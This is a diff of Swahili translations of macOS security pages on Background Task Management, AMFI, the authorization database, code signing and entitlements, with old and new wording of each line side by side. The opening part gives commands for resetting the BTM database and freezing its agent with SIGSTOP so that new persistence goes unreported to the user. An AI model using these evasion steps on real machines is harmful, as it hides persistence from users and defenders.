- **Kurekebisha hifadhidata**: Kukimbia amri ifuatayo kutarekebisha hifadhidata (inapaswa kujenga upya kutoka mwanzo), hata hivyo, kwa sababu fulani, baada ya kukimbia hii, **hakuna uvumbuzi mpya utakaonyeshwa hadi mfumo uanzishwe upya**.
- **Kurekebisha hifadhidata**: Kukimbia amri ifuatayo kutarekebisha hifadhidata (inapaswa kujenga upya kutoka mwanzo), hata hivyo, kwa sababu fulani, baada ya kukimbia hii, **hakuna uvumbuzi mpya utakaonyeshwa hadi mfumo urejelewe**.
- **root** inahitajika.
```bash
# Reset the database
sfltool resettbtm
```
- **Stop the Agent**: Inawezekana kutuma ishara ya kusitisha kwa wakala ili **isiwe inamwonya mtumiaji** wakati ugunduzi mpya unapopatikana.
- **Simamisha Wakala**: Inawezekana kutuma ishara ya kusimamisha kwa wakala ili **asiweze kumjulisha mtumiaji** wakati ugunduzi mpya unapopatikana.
```bash
# Get PID
pgrep BackgroundTaskManagementAgent
@ -124,7 +124,7 @@ kill -SIGSTOP 1011
ps -o state 1011
T
```
- **Bug**: Ikiwa **mchakato uliounda kudumu upo haraka baada yake**, daemon itajaribu **kupata taarifa** kuhusu hiyo, **itashindwa**, na **haitaweza kutuma tukio** linaloashiria kwamba kitu kipya kinadumu.
- **Kosa**: Ikiwa **mchakato uliounda kudumu upo haraka baada yake**, daemon itajaribu **kupata taarifa** kuhusu hiyo, **itashindwa**, na **haitaweza kutuma tukio** linaloashiria kwamba kitu kipya kinadumu.
Marejeo na **maelezo zaidi kuhusu BTM**:

30
src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-amfi-applemobilefileintegrity.md
View File

@ -4,7 +4,7 @@
## AppleMobileFileIntegrity.kext na amfid
Inalenga nguvu ya kuhakikisha uadilifu wa msimbo unaotumika kwenye mfumo ikitoa mantiki nyuma ya uthibitishaji wa saini ya msimbo wa XNU. Pia ina uwezo wa kuangalia haki na kushughulikia kazi nyingine nyeti kama vile kuruhusu ufuatiliaji au kupata bandari za kazi.
Inalenga nguvu ya kuhakikisha uadilifu wa msimbo unaotumika kwenye mfumo ikitoa mantiki nyuma ya uthibitishaji wa saini ya msimbo wa XNU. Pia ina uwezo wa kuangalia haki na kushughulikia kazi nyingine nyeti kama vile kuruhusu urekebishaji au kupata bandari za kazi.
Zaidi ya hayo, kwa baadhi ya operesheni, kext inapendelea kuwasiliana na nafasi ya mtumiaji inayotumia daemon `/usr/libexec/amfid`. Uhusiano huu wa kuaminiana umekataliwa katika jailbreak nyingi.
@ -12,9 +12,9 @@ AMFI inatumia sera za **MACF** na inajiandikisha kwa nyoka zake mara inapoanzish
- `amfi_unrestricted_task_for_pid`: Ruhusu task_for_pid kuruhusiwa bila haki zinazohitajika
- `amfi_allow_any_signature`: Ruhusu saini yoyote ya msimbo
- `cs_enforcement_disable`: Hoja ya mfumo mzima inayotumika kuzima utekelezaji wa saini ya msimbo
- `cs_enforcement_disable`: Hoja ya mfumo mzima inayotumika kuzuia utekelezaji wa saini ya msimbo
- `amfi_prevent_old_entitled_platform_binaries`: Batilisha binaries za jukwaa zenye haki
- `amfi_get_out_of_my_way`: Inazima amfi kabisa
- `amfi_get_out_of_my_way`: Inazuia amfi kabisa
Hizi ni baadhi ya sera za MACF ambazo inajiandikisha:
@ -26,18 +26,18 @@ Hizi ni baadhi ya sera za MACF ambazo inajiandikisha:
- **`file_check_mmap`:** Inakagua ikiwa mmap inapata kumbukumbu na kuipatia kama inayoweza kutekelezwa. Katika kesi hiyo inakagua ikiwa uthibitishaji wa maktaba unahitajika na ikiwa ndivyo, inaita kazi ya uthibitishaji wa maktaba.
- **`file_check_library_validation`**: Inaita kazi ya uthibitishaji wa maktaba ambayo inakagua miongoni mwa mambo mengine ikiwa binary ya jukwaa inapakua binary nyingine ya jukwaa au ikiwa mchakato na faili mpya iliyopakuliwa zina TeamID sawa. Haki fulani pia zitaruhusu kupakua maktaba yoyote.
- **`policy_initbsd`**: Inaanzisha Funguo za NVRAM zinazotegemewa
- **`policy_syscall`**: Inakagua sera za DYLD kama binary ina sehemu zisizo na kikomo, ikiwa inapaswa kuruhusu env vars... hii pia inaitwa wakati mchakato unapoanzishwa kupitia `amfi_check_dyld_policy_self()`.
- **`proc_check_inherit_ipc_ports`**: Inakagua ikiwa wakati mchakato unatekeleza binary mpya mchakato mingine yenye haki za SEND juu ya bandari ya kazi ya mchakato inapaswa kuendelea kuwa nazo au la. Binaries za jukwaa zinaruhusiwa, `get-task-allow` inayohitajika inaruhusu, `task_for_pid-allow` inaruhusiwa na binaries zenye TeamID sawa.
- **`policy_syscall`**: Inakagua sera za DYLD kama binary ina sehemu zisizo na kikomo, ikiwa inapaswa kuruhusu env vars... hii pia inaitwa wakati mchakato unaanzishwa kupitia `amfi_check_dyld_policy_self()`.
- **`proc_check_inherit_ipc_ports`**: Inakagua ikiwa wakati mchakato unatekeleza binary mpya mchakato mingine yenye haki za SEND juu ya bandari ya kazi ya mchakato inapaswa kuendelea nazo au la. Binaries za jukwaa zinaruhusiwa, `get-task-allow` inayohitajika inaruhusu, `task_for_pid-allow` inaruhusiwa na binaries zenye TeamID sawa.
- **`proc_check_expose_task`**: inatekeleza haki
- **`amfi_exc_action_check_exception_send`**: Ujumbe wa kipekee unatumwa kwa debugger
- **`amfi_exc_action_label_associate & amfi_exc_action_label_copy/populate & amfi_exc_action_label_destroy & amfi_exc_action_label_init & amfi_exc_action_label_update`**: Mzunguko wa lebo wakati wa kushughulikia kipekee (ufuatiliaji)
- **`amfi_exc_action_label_associate & amfi_exc_action_label_copy/populate & amfi_exc_action_label_destroy & amfi_exc_action_label_init & amfi_exc_action_label_update`**: Mzunguko wa lebo wakati wa kushughulikia kipekee (urekebishaji)
- **`proc_check_get_task`**: Inakagua haki kama `get-task-allow` ambayo inaruhusu mchakato mingine kupata bandari za kazi na `task_for_pid-allow`, ambayo inaruhusu mchakato kupata bandari za kazi za mchakato mingine. Ikiwa hakuna hata moja ya hizo, inaita `amfid permitunrestricteddebugging` kuangalia ikiwa inaruhusiwa.
- **`proc_check_mprotect`**: Kata ikiwa `mprotect` inaitwa na bendera `VM_PROT_TRUSTED` ambayo inaonyesha kuwa eneo linapaswa kutendewa kana kwamba lina saini halali ya msimbo.
- **`vnode_check_exec`**: Inaitwa wakati faili zinazoweza kutekelezwa zinapopakuliwa kwenye kumbukumbu na kuweka `cs_hard | cs_kill` ambayo itaua mchakato ikiwa mojawapo ya kurasa inakuwa batili
- **`vnode_check_getextattr`**: MacOS: Angalia `com.apple.root.installed` na `isVnodeQuarantined()`
- **`vnode_check_setextattr`**: Kama pata + com.apple.private.allow-bless na haki sawa na mfunguo wa ndani
- &#x20;**`vnode_check_signature`**: Msimbo unaoitwa XNU kuangalia saini ya msimbo kwa kutumia haki, cache ya kuaminika na `amfid`
- &#x20;**`proc_check_run_cs_invalid`**: Inakabili `ptrace()` calls (`PT_ATTACH` na `PT_TRACE_ME`). Inakagua haki zozote za `get-task-allow`, `run-invalid-allow` na `run-unsigned-code` na ikiwa hakuna, inakagua ikiwa ufuatiliaji unaruhusiwa.
- &#x20;**`proc_check_run_cs_invalid`**: Inakabili `ptrace()` calls (`PT_ATTACH` na `PT_TRACE_ME`). Inakagua kwa haki zozote `get-task-allow`, `run-invalid-allow` na `run-unsigned-code` na ikiwa hakuna, inakagua ikiwa urekebishaji unaruhusiwa.
- **`proc_check_map_anon`**: Ikiwa mmap inaitwa na bendera **`MAP_JIT`**, AMFI itakagua haki ya `dynamic-codesigning`.
`AMFI.kext` pia inatoa API kwa nyongeza nyingine za kernel, na inawezekana kupata utegemezi wake kwa:
@ -68,7 +68,7 @@ No variant specified, falling back to release
Hii ni huduma inayotumia mtumiaji ambayo `AMFI.kext` itatumia kuangalia saini za msimbo katika hali ya mtumiaji.\
Ili `AMFI.kext` iweze kuwasiliana na huduma, inatumia ujumbe wa mach kupitia bandari `HOST_AMFID_PORT` ambayo ni bandari maalum `18`.
Kumbuka kwamba katika macOS si tena inawezekana kwa michakato ya root kuchukua bandari maalum kwani zinahifadhiwa na `SIP` na ni launchd pekee inayoweza kuzipata. Katika iOS inakaguliwa kwamba mchakato unaotuma jibu nyuma una CDHash iliyowekwa ya `amfid`.
Kumbuka kwamba katika macOS si tena inawezekana kwa michakato ya root kuchukua bandari maalum kwani zinahifadhiwa na `SIP` na ni launchd pekee inayoweza kuzichukua. Katika iOS inakaguliwa kwamba mchakato unaotuma jibu nyuma una CDHash iliyowekwa ya `amfid`.
Inawezekana kuona wakati `amfid` inapoombwa kuangalia binary na jibu lake kwa kuibua na kuweka breakpoint katika `mach_msg`.
@ -80,7 +80,7 @@ Profaili ya usambazaji inaweza kutumika kusaini msimbo. Kuna profaili za **Devel
Baada ya App kuwasilishwa kwa Duka la Apple, ikiwa imeidhinishwa, inasainiwa na Apple na profaili ya usambazaji haitahitajika tena.
Profaili kwa kawaida hutumia kiambatisho `.mobileprovision` au `.provisionprofile` na inaweza kutolewa kwa:
Profaili kwa kawaida hutumia kiambishi `.mobileprovision` au `.provisionprofile` na inaweza kutolewa kwa:
```bash
openssl asn1parse -inform der -in /path/to/profile
@ -88,25 +88,25 @@ openssl asn1parse -inform der -in /path/to/profile
security cms -D -i /path/to/profile
```
Ingawa wakati mwingine huitwa kama vyeti, hizi profiles za usambazaji zina zaidi ya cheti:
Ingawa wakati mwingine huitwa kama vyeti, hizi profaili za ugawaji zina zaidi ya cheti:
- **AppIDName:** Kitambulisho cha Programu
- **AppleInternalProfile**: Inatambulisha hii kama profaili ya Ndani ya Apple
- **ApplicationIdentifierPrefix**: Imewekwa kabla ya AppIDName (sawa na TeamIdentifier)
- **ApplicationIdentifierPrefix**: Imeongezwa kwa AppIDName (sawa na TeamIdentifier)
- **CreationDate**: Tarehe katika muundo wa `YYYY-MM-DDTHH:mm:ssZ`
- **DeveloperCertificates**: Mfululizo wa (kwa kawaida mmoja) cheti, kilich encoded kama data ya Base64
- **Entitlements**: Haki zinazoruhusiwa na haki za profaili hii
- **ExpirationDate**: Tarehe ya kuisha katika muundo wa `YYYY-MM-DDTHH:mm:ssZ`
- **Name**: Jina la Programu, sawa na AppIDName
- **ProvisionedDevices**: Mfululizo (kwa cheti za waendelezaji) wa UDIDs ambazo profaili hii ni halali
- **ProvisionedDevices**: Mfululizo (kwa cheti za waendelezaji) za UDIDs ambazo profaili hii ni halali
- **ProvisionsAllDevices**: Boolean (kweli kwa cheti za biashara)
- **TeamIdentifier**: Mfululizo wa (kwa kawaida mmoja) nyuzi za alphanumeric zinazotumika kutambulisha mendelezi kwa ajili ya mwingiliano kati ya programu
- **TeamIdentifier**: Mfululizo wa (kwa kawaida mmoja) nyuzi za alfanumeriki zinazotumika kutambulisha mendelezi kwa madhumuni ya mwingiliano kati ya programu
- **TeamName**: Jina linaloweza kusomeka na binadamu linalotumika kutambulisha mendelezi
- **TimeToLive**: Uhalali (katika siku) wa cheti
- **UUID**: Kitambulisho cha Kipekee Duniani kwa profaili hii
- **Version**: Kwa sasa imewekwa kuwa 1
Kumbuka kwamba kipengele cha haki kitakuwa na seti iliyozuiliwa ya haki na profaili ya usambazaji itakuwa na uwezo wa kutoa haki hizo maalum ili kuzuia kutoa haki za kibinafsi za Apple.
Kumbuka kwamba kipengele cha haki kitakuwa na seti iliyozuiliwa ya haki na profaili ya ugawaji itakuwa na uwezo wa kutoa haki hizo maalum ili kuzuia kutoa haki za kibinafsi za Apple.
Kumbuka kwamba profaili kwa kawaida zinapatikana katika `/var/MobileDeviceProvisioningProfiles` na inawezekana kuziangalia kwa **`security cms -D -i /path/to/profile`**
@ -118,7 +118,7 @@ Katika macOS hii iko ndani ya `MobileDevice.framework`.
## AMFI Trust Caches
iOS AMFI inashikilia orodha ya hash zinazojulikana ambazo zimesainiwa ad-hoc, inayoitwa **Trust Cache** na kupatikana katika sehemu ya kext's `__TEXT.__const`. Kumbuka kwamba katika operesheni maalum na nyeti inawezekana kupanua Trust Cache hii kwa faili ya nje.
iOS AMFI inashikilia orodha ya hash zinazojulikana ambazo zimesainiwa ad-hoc, zinazoitwa **Trust Cache** na kupatikana katika sehemu ya `__TEXT.__const` ya kext. Kumbuka kwamba katika operesheni maalum na nyeti inawezekana kupanua Trust Cache hii kwa faili ya nje.
## References

14
src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-authorizations-db-and-authd.md
View File

@ -6,7 +6,7 @@
Hifadhidata iliyoko katika `/var/db/auth.db` ni hifadhidata inayotumika kuhifadhi ruhusa za kufanya operesheni nyeti. Operesheni hizi zinafanywa kabisa katika **nafasi ya mtumiaji** na kwa kawaida hutumiwa na **XPC services** ambazo zinahitaji kuangalia **kama mteja anayepiga simu ameidhinishwa** kufanya kitendo fulani kwa kuangalia hifadhidata hii.
Kwanza, hifadhidata hii inaundwa kutoka kwa maudhui ya `/System/Library/Security/authorization.plist`. Kisha, baadhi ya huduma zinaweza kuongeza au kubadilisha hifadhidata hii ili kuongeza ruhusa nyingine.
Kwanza, hifadhidata hii inaundwa kutoka kwa maudhui ya `/System/Library/Security/authorization.plist`. Kisha, huduma zingine zinaweza kuongeza au kubadilisha hifadhidata hii ili kuongeza ruhusa nyingine.
Sheria zinaifadhiwa katika jedwali la `rules` ndani ya hifadhidata na zina nguzo zifuatazo:
@ -15,17 +15,17 @@ Sheria zinaifadhiwa katika jedwali la `rules` ndani ya hifadhidata na zina nguzo
- **type**: Inaelezea aina ya sheria, iliyozuiliwa kwa thamani 1 au 2 ili kufafanua mantiki yake ya idhini.
- **class**: Inagawanya sheria katika darasa maalum, kuhakikisha ni nambari chanya.
- "allow" kwa ruhusu, "deny" kwa kataa, "user" ikiwa mali ya kundi inaonyesha kundi ambalo uanachama wake unaruhusu ufikiaji, "rule" inaonyesha katika orodha sheria inayopaswa kutimizwa, "evaluate-mechanisms" ikifuatwa na orodha ya `mechanisms` ambazo ni ama za ndani au jina la kifurushi ndani ya `/System/Library/CoreServices/SecurityAgentPlugins/` au /Library/Security//SecurityAgentPlugins
- **group**: Inaonyesha kundi la mtumiaji lililohusishwa na sheria kwa ajili ya idhini ya msingi ya kundi.
- **kofn**: Inawakilisha parameter ya "k-of-n", ikiamua ni subrules ngapi zinapaswa kutimizwa kutoka kwa jumla.
- **group**: Inaonyesha kundi la mtumiaji linalohusishwa na sheria kwa ajili ya idhini ya msingi ya kundi.
- **kofn**: Inaonyesha parameter ya "k-of-n", ikiamua ni subrules ngapi zinapaswa kutimizwa kutoka kwa jumla.
- **timeout**: Inaelezea muda kwa sekunde kabla ya idhini iliyotolewa na sheria kuisha.
- **flags**: Inashikilia bendera mbalimbali zinazobadilisha tabia na sifa za sheria.
- **flags**: Ina vitu mbalimbali vinavyobadilisha tabia na sifa za sheria.
- **tries**: Inapunguza idadi ya majaribio ya idhini yanayoruhusiwa ili kuongeza usalama.
- **version**: Inafuatilia toleo la sheria kwa ajili ya udhibiti wa toleo na masasisho.
- **created**: Inarekodi muda wa kuunda sheria kwa ajili ya madhumuni ya ukaguzi.
- **modified**: Inahifadhi muda wa marekebisho ya mwisho yaliyofanywa kwa sheria.
- **created**: Inarekodi alama ya wakati wakati sheria ilipoundwa kwa ajili ya ukaguzi.
- **modified**: Inahifadhi alama ya wakati wa marekebisho ya mwisho yaliyofanywa kwa sheria.
- **hash**: Inashikilia thamani ya hash ya sheria ili kuhakikisha uaminifu wake na kugundua udanganyifu.
- **identifier**: Inatoa kitambulisho cha kipekee cha mfuatano, kama UUID, kwa marejeleo ya nje kwa sheria.
- **requirement**: Inashikilia data iliyosawazishwa inayofafanua mahitaji maalum ya idhini ya sheria na mitambo.
- **requirement**: Ina data iliyosimbwa ikielezea mahitaji maalum ya idhini ya sheria na mitambo.
- **comment**: Inatoa maelezo yanayoweza kusomeka na binadamu au maoni kuhusu sheria kwa ajili ya nyaraka na uwazi.
### Example

44
src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-code-signing.md
View File

@ -38,14 +38,14 @@ char data[];
} CS_GenericBlob
__attribute__ ((aligned(1)));
```
Vikundi vya kawaida vilivyomo ni Mkurugenzi wa Kanuni, Mahitaji na Haki na Mfumo wa Ujumbe wa Kijadi (CMS).\
Zaidi ya hayo, kumbuka jinsi data iliyowekwa kwenye vikundi inavyowekwa kwa **Big Endian.**
Blobs za kawaida zinazopatikana ni Directory ya Kanuni, Mahitaji na Haki na Syntax ya Ujumbe wa Kijadi (CMS).\
Zaidi ya hayo, kumbuka jinsi data iliyowekwa kwenye blobs inavyowekwa kwa **Big Endian.**
Zaidi ya hayo, saini zinaweza kutengwa kutoka kwa binaries na kuhifadhiwa katika `/var/db/DetachedSignatures` (inayotumiwa na iOS).
## Mkurugenzi wa Kanuni Blob
## Blob ya Directory ya Kanuni
Inawezekana kupata tangazo la [Mkurugenzi wa Kanuni Blob katika msimbo](https://github.com/apple-oss-distributions/xnu/blob/94d3b452840153a99b38a3a9659680b2a006908e/osfmk/kern/cs_blobs.h#L104):
Inawezekana kupata tangazo la [Blob ya Directory ya Kanuni katika msimbo](https://github.com/apple-oss-distributions/xnu/blob/94d3b452840153a99b38a3a9659680b2a006908e/osfmk/kern/cs_blobs.h#L104):
```c
typedef struct __CodeDirectory {
uint32_t magic; /* magic number (CSMAGIC_CODEDIRECTORY) */
@ -105,8 +105,8 @@ Kumbuka kwamba kuna toleo tofauti za hii struct ambapo za zamani zinaweza kuwa n
## Signing Code Pages
Kuhesabu hash ya binary kamili ingekuwa isiyo na ufanisi na hata isiyo na maana ikiwa inapo load tu kwa sehemu katika kumbukumbu. Kwa hivyo, saini ya msimbo kwa kweli ni hash ya hashes ambapo kila ukurasa wa binary unahesabiwa hash kivyake.\
Kwa kweli, katika **Code Directory** ya awali unaweza kuona kwamba **ukubwa wa ukurasa umeainishwa** katika moja ya mashamba yake. Zaidi ya hayo, ikiwa ukubwa wa binary si kipande cha ukubwa wa ukurasa, shamba la **CodeLimit** linaeleza wapi mwisho wa saini uko.
Kuhesabu hash ya binary kamili kutakuwa na ufanisi mdogo na hata kutokuwa na maana ikiwa inapo load tu sehemu yake kwenye kumbukumbu. Kwa hivyo, saini ya msimbo kwa kweli ni hash ya hashes ambapo kila ukurasa wa binary unahesabiwa hash kivyake.\
Kwa kweli, katika **Code Directory** ya awali unaweza kuona kwamba **ukubwa wa ukurasa umeainishwa** katika moja ya maeneo yake. Zaidi ya hayo, ikiwa ukubwa wa binary si kipande cha ukubwa wa ukurasa, eneo la **CodeLimit** linaeleza ambapo mwisho wa saini uko.
```bash
# Get all hashes of /bin/ps
codesign -d -vvvvvv /bin/ps
@ -144,13 +144,13 @@ openssl sha256 /tmp/*.page.*
```
## Entitlements Blob
Kumbuka kwamba programu zinaweza pia kuwa na **entitlement blob** ambapo haki zote zimefafanuliwa. Zaidi ya hayo, baadhi ya binaries za iOS zinaweza kuwa na haki zao maalum katika sloti maalum -7 (badala ya katika sloti maalum -5 za haki).
Kumbuka kwamba programu zinaweza pia kuwa na **entitlement blob** ambapo haki zote zinafafanuliwa. Zaidi ya hayo, baadhi ya binaries za iOS zinaweza kuwa na haki zao maalum katika sloti maalum -7 (badala ya katika sloti maalum -5 za haki).
## Special Slots
Programu za MacOS hazina kila kitu wanachohitaji kutekeleza ndani ya binary lakini pia zinatumia **vyanzo vya nje** (kawaida ndani ya **bundle** za programu). Hivyo, kuna baadhi ya sloti ndani ya binary ambazo zitakuwa na hash za baadhi ya vyanzo vya nje vya kuvutia ili kuangalia kwamba havijabadilishwa.
Kwa kweli, inawezekana kuona katika muundo wa Code Directory parameter inayoitwa **`nSpecialSlots`** ikionyesha idadi ya sloti maalum. Hakuna sloti maalum 0 na zile zinazotumika zaidi (kutoka -1 hadi -6 ni):
Kwa kweli, inawezekana kuona katika muundo wa Code Directory parameter inayoitwa **`nSpecialSlots`** ikionyesha idadi ya sloti maalum. Hakuna sloti maalum 0 na zile za kawaida zaidi (kutoka -1 hadi -6 ni):
- Hash ya `info.plist` (au ile ndani ya `__TEXT.__info__plist`).
- Hash ya Mahitaji
@ -158,11 +158,11 @@ Kwa kweli, inawezekana kuona katika muundo wa Code Directory parameter inayoitwa
- Maalum kwa programu (isiyotumika)
- Hash ya haki
- Saini za msimbo wa DMG pekee
- DER Entitlements
- Haki za DER
## Code Signing Flags
Kila mchakato una bitmask inayohusiana inayojulikana kama `status` ambayo inaanzishwa na kernel na baadhi yao zinaweza kubadilishwa na **saini ya msimbo**. Bendera hizi ambazo zinaweza kujumuishwa katika saini ya msimbo zimeelezwa [katika msimbo](https://github.com/apple-oss-distributions/xnu/blob/94d3b452840153a99b38a3a9659680b2a006908e/osfmk/kern/cs_blobs.h#L36):
Kila mchakato una bitmask inayohusiana inayojulikana kama `status` ambayo inaanzishwa na kernel na baadhi yao zinaweza kubadilishwa na **saini ya msimbo**. Bendera hizi ambazo zinaweza kujumuishwa katika saini ya msimbo zina [fafanuliwa katika msimbo](https://github.com/apple-oss-distributions/xnu/blob/94d3b452840153a99b38a3a9659680b2a006908e/osfmk/kern/cs_blobs.h#L36):
```c
/* code signing attributes of a process */
#define CS_VALID 0x00000001 /* dynamically valid */
@ -207,13 +207,13 @@ CS_RESTRICT | CS_ENFORCEMENT | CS_REQUIRE_LV | CS_RUNTIME | CS_LINKER_SIGNED)
#define CS_ENTITLEMENT_FLAGS (CS_GET_TASK_ALLOW | CS_INSTALLER | CS_DATAVAULT_CONTROLLER | CS_NVRAM_UNRESTRICTED)
```
Kumbuka kwamba kazi [**exec_mach_imgact**](https://github.com/apple-oss-distributions/xnu/blob/94d3b452840153a99b38a3a9659680b2a006908e/bsd/kern/kern_exec.c#L1420) inaweza pia kuongeza bendera za `CS_EXEC_*` kwa njia ya kidinamik wakati wa kuanza utekelezaji.
Kumbuka kwamba kazi [**exec_mach_imgact**](https://github.com/apple-oss-distributions/xnu/blob/94d3b452840153a99b38a3a9659680b2a006908e/bsd/kern/kern_exec.c#L1420) inaweza pia kuongeza bendera `CS_EXEC_*` kwa njia ya kidinamik wakati wa kuanza utekelezaji.
## Mahitaji ya Saini ya Kanuni
Kila programu ina **mahitaji** ambayo lazima **yatimizwe** ili iweze kutekelezwa. Ikiwa **programu ina mahitaji ambayo hayajatimizwa na programu**, haitatekelezwa (kama imebadilishwa).
Mahitaji ya binary hutumia **sarufi maalum** ambayo ni mtiririko wa **maelezo** na yanaandikwa kama blobs kwa kutumia `0xfade0c00` kama uchawi ambao **hash yake inahifadhiwa katika sloti maalum ya kanuni**.
Mahitaji ya binary hutumia **sarufi maalum** ambayo ni mtiririko wa **maelezo** na yanakodishwa kama blobs kwa kutumia `0xfade0c00` kama uchawi ambao **hash yake inahifadhiwa katika sloti maalum ya kanuni**.
Mahitaji ya binary yanaweza kuonekana kwa kukimbia:
```bash
@ -226,7 +226,7 @@ Executable=/Applications/Signal.app/Contents/MacOS/Signal
designated => identifier "org.whispersystems.signal-desktop" and anchor apple generic and certificate 1[field.1.2.840.113635.100.6.2.6] /* exists */ and certificate leaf[field.1.2.840.113635.100.6.1.13] /* exists */ and certificate leaf[subject.OU] = U68MSDN6DR
```
> [!NOTE]
> Kumbuka jinsi saini hizi zinaweza kuangalia mambo kama taarifa za uthibitisho, TeamID, IDs, haki na data nyingine nyingi.
> Kumbuka jinsi saini hizi zinaweza kuangalia mambo kama taarifa za uthibitisho, TeamID, IDs, ruhusa na data nyingine nyingi.
Zaidi ya hayo, inawezekana kuzalisha baadhi ya mahitaji yaliyokusanywa kwa kutumia zana ya `csreq`:
```bash
@ -244,14 +244,14 @@ od -A x -t x1 /tmp/output.csreq
- **`Sec[Static]CodeCheckValidity`**: Angalia uhalali wa SecCodeRef kwa Kihitaji.
- **`SecRequirementEvaluate`**: Thibitisha hitaji katika muktadha wa cheti.
- **`SecTaskValidateForRequirement`**: Thibitisha SecTask inayotembea dhidi ya hitaji la `CFString`.
- **`SecTaskValidateForRequirement`**: Thibitisha SecTask inayokimbia dhidi ya hitaji la `CFString`.
#### **Kuunda na Kusimamia Mahitaji ya Nambari**
- **`SecRequirementCreateWithData`:** Inaunda `SecRequirementRef` kutoka kwa data ya binary inayowakilisha hitaji.
- **`SecRequirementCreateWithString`:** Inaunda `SecRequirementRef` kutoka kwa usemi wa maandiko wa hitaji.
- **`SecRequirementCopy[Data/String]`**: Inapata uwakilishi wa data ya binary wa `SecRequirementRef`.
- **`SecRequirementCreateGroup`**: Unda hitaji kwa ushirika wa programu.
- **`SecRequirementCreateGroup`**: Unda hitaji la uanachama wa kundi la programu.
#### **Kupata Taarifa za Kusaini Nambari**
@ -261,20 +261,20 @@ od -A x -t x1 /tmp/output.csreq
#### **Kubadilisha Mahitaji ya Nambari**
- **`SecCodeSignerCreate`**: Inaunda kipande cha `SecCodeSignerRef` kwa ajili ya kufanya operesheni za kusaini nambari.
- **`SecCodeSignerSetRequirement`**: Inaweka hitaji jipya kwa ajili ya msaini wa nambari kutekeleza wakati wa kusaini.
- **`SecCodeSignerAddSignature`**: Inaongeza saini kwa nambari inayosainiwa na msaini aliyeainishwa.
- **`SecCodeSignerSetRequirement`**: Inaweka hitaji jipya kwa ajili ya kusaini nambari wakati wa kusaini.
- **`SecCodeSignerAddSignature`**: Inaongeza saini kwa nambari inayosainiwa na saini iliyotolewa.
#### **Kuthibitisha Nambari kwa Mahitaji**
- **`SecStaticCodeCheckValidity`**: Inathibitisha kipande cha nambari ya static dhidi ya mahitaji yaliyoainishwa.
- **`SecStaticCodeCheckValidity`**: Inathibitisha kipande cha nambari ya static dhidi ya mahitaji yaliyotolewa.
#### **APIs za Ziada za Faida**
- **`SecCodeCopy[Internal/Designated]Requirement`: Pata SecRequirementRef kutoka SecCodeRef**
- **`SecCodeCopyGuestWithAttributes`**: Inaunda `SecCodeRef` inayowakilisha kipande cha nambari kulingana na sifa maalum, muhimu kwa sandboxing.
- **`SecCodeCopyPath`**: Inapata njia ya mfumo wa faili inayohusiana na `SecCodeRef`.
- **`SecCodeCopySigningIdentifier`**: Inapata kitambulisho cha kusaini (mfano, Timu ID) kutoka kwa `SecCodeRef`.
- **`SecCodeGetTypeID`**: Inarudisha kitambulisho cha aina kwa ajili ya `SecCodeRef` vitu.
- **`SecCodeCopySigningIdentifier`**: Inapata kitambulisho cha kusaini (mfano, Kitambulisho cha Timu) kutoka kwa `SecCodeRef`.
- **`SecCodeGetTypeID`**: Inarudisha kitambulisho cha aina kwa ajili ya vitu vya `SecCodeRef`.
- **`SecRequirementGetTypeID`**: Inapata CFTypeID ya `SecRequirementRef`.
#### **Bendera na Misingi ya Kusaini Nambari**
@ -284,11 +284,11 @@ od -A x -t x1 /tmp/output.csreq
## Utekelezaji wa Saini ya Nambari
**kernel** ndiye anayechunguza **saini ya nambari** kabla ya kuruhusu nambari ya programu kutekelezwa. Aidha, njia moja ya kuwa na uwezo wa kuandika na kutekeleza nambari mpya katika kumbukumbu ni kutumia JIT ikiwa `mprotect` inaitwa na bendera ya `MAP_JIT`. Kumbuka kwamba programu inahitaji haki maalum ili iweze kufanya hivi.
**kernel** ndiye anayechunguza **saini ya nambari** kabla ya kuruhusu nambari ya programu kutekelezwa. Aidha, njia moja ya kuweza kuandika na kutekeleza nambari mpya katika kumbukumbu ni kutumia JIT ikiwa `mprotect` inaitwa na bendera ya `MAP_JIT`. Kumbuka kwamba programu inahitaji ruhusa maalum ili iweze kufanya hivi.
## `cs_blobs` & `cs_blob`
[**cs_blob**](https://github.com/apple-oss-distributions/xnu/blob/94d3b452840153a99b38a3a9659680b2a006908e/bsd/sys/ubc_internal.h#L106) muundo unashikilia taarifa kuhusu haki ya mchakato unaotembea juu yake. `csb_platform_binary` pia inaarifu ikiwa programu ni binary ya jukwaa (ambayo inakaguliwa katika nyakati tofauti na OS ili kutekeleza mitambo ya usalama kama kulinda haki za SEND kwa bandari za kazi za mchakato haya).
[**cs_blob**](https://github.com/apple-oss-distributions/xnu/blob/94d3b452840153a99b38a3a9659680b2a006908e/bsd/sys/ubc_internal.h#L106) muundo unashikilia taarifa kuhusu ruhusa ya mchakato unaokimbia juu yake. `csb_platform_binary` pia inaarifu ikiwa programu ni binary ya jukwaa (ambayo inakaguliwa katika nyakati tofauti na OS ili kutekeleza mitambo ya usalama kama kulinda haki za SEND kwa bandari za kazi za mchakato haya).
```c
struct cs_blob {
struct cs_blob *csb_next;

20
src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-dangerous-entitlements.md
View File

@ -9,11 +9,11 @@
### `com.apple.rootless.install.heritable`
Entitlement **`com.apple.rootless.install.heritable`** inaruhusu **kupita SIP**. Angalia [hii kwa maelezo zaidi](macos-sip.md#com.apple.rootless.install.heritable).
Entitlement **`com.apple.rootless.install.heritable`** inaruhusu **kuzidi SIP**. Angalia [hii kwa maelezo zaidi](macos-sip.md#com.apple.rootless.install.heritable).
### **`com.apple.rootless.install`**
Entitlement **`com.apple.rootless.install`** inaruhusu **kupita SIP**. Angalia [hii kwa maelezo zaidi](macos-sip.md#com.apple.rootless.install).
Entitlement **`com.apple.rootless.install`** inaruhusu **kuzidi SIP**. Angalia [hii kwa maelezo zaidi](macos-sip.md#com.apple.rootless.install).
### **`com.apple.system-task-ports` (iliyokuwa inaitwa `task_for_pid-allow`)**
@ -21,11 +21,11 @@ Entitlement hii inaruhusu kupata **task port kwa mchakato wowote**, isipokuwa ke
### `com.apple.security.get-task-allow`
Entitlement hii inaruhusu michakato mingine yenye entitlement **`com.apple.security.cs.debugger`** kupata task port ya mchakato unaotendwa na binary yenye entitlement hii na **kuingiza msimbo ndani yake**. Angalia [**hii kwa maelezo zaidi**](../macos-proces-abuse/macos-ipc-inter-process-communication/).
